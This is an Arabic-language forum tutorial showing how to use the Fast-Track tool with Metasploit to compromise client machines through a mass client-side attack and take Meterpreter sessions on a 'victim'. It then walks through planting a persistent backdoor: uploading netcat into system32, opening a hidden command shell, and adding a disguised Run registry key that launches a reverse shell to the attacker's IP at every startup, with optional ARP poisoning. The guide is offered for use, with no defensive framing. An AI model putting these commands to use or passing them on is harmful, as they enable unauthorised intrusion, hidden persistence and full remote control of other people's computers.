هلوووووز شباب شلونكم اليوم
الموضوع شي حصري وجديد
طبعا المكتوب واضح من عنوانه ..
راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side
باختصار هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت بوقت واحد و في ايفريم واحد على سيرفر محلي ..
زين ندخل على التيرمنال بصلاحة رووت
و نكتب الامر لدخول مجلد الفاست تراك
كود:
cd/pentest/exploits/fasttrack
لمن يستعرض الملفات الموجودة بالمجلد تلكي سكربت الفاست تراك بلغة البايثون
هسة نفذ امر تشغلية
كود:
./fast-track.py -i
-i يعني تشغيل السكربت داخل التيرمنال ..
هسة يطلع عدنة عدة خيارات ممكن تنفذها .. و كل مهمة الها رقم محدد
هجومنا المطلوب اسمه Mass Client-Side Attack و رقمه 4 .. يعني نحدده بالرقم 4
ونوب يطلب منك السكربت تخلي الاي بي الي راح يكون سيرفر للتنصت عليه ( الاي بي مالتك طبعا )
بعدين يعرض الك 4 بايلودات تختار منها اللي تريدة .. احسن شي Meterpreter لان راح نستخدمه بعد شوية لسهولته ..
هسة لح يسألك اذا تريد تسوي ارب بويزنينكـ بويزنينك كولة منه لا ..
هسة الاداة تشتغل و تجميع الثغرات الممكن و بدا السيرفر ..
ننتظر لحد ما ينتهي .. بكملة Server started
هسة تكدر تسوي سبوفينك بالسيرفر
عموما هسة نفرض جبنة الضحية يكولك انوا شي جديدة مفتوحة ..
ندخل لها بالامر
sessions -i 1
يعني رقم الشي الجديد ..
هسة كدامك الضحية.. وتكدر تتحكم بيه تحكم كااااامل
———————————————————————–
هسة نجي للسالوفة الحلوة 😉
المفاجئة يا حبي هية استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري حتى يتنصت على الاي بي مالتنة داخل مجلد بدء التشغيل ..
اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية ..
كود:
upload /tmp/nc.exe C:\\windows\\system32\\nc.exe
هسة ندخل على موجه الاوامر مال ضحية ..
كود:
execute -c -H -f cmd.exe -i
زين هسة لح تسألوني شسوة هذة,؟
امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd.exe 192.168.1.3 4444
مع التغيير للاي بي مالتك .. و المقصود بهذا الامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر ..;)
وهذة الامر كاملاً
كود:
reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd.exe 192.168.1.3 4444"/
reg add : واضح .. امر بدائي لاضافة اي مفتاح
hklm : و تعني مجلد HKEY_LOCAL_MACHINE
/v : و تعني اسم المفتاح و اني هنا موهت بالاسم systemfile
/t : و تعني نوع المفتاح و الاغلب يكون reg_sz
/d : و هنا تتلخص السالفة مالتنة.. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd.exe 192.168.1.3 4444
الان و بعد زرع المفتاح ..
نروح للتيرمنال و ونتنصت على البورت 4444 ..
nc -vlp 4444
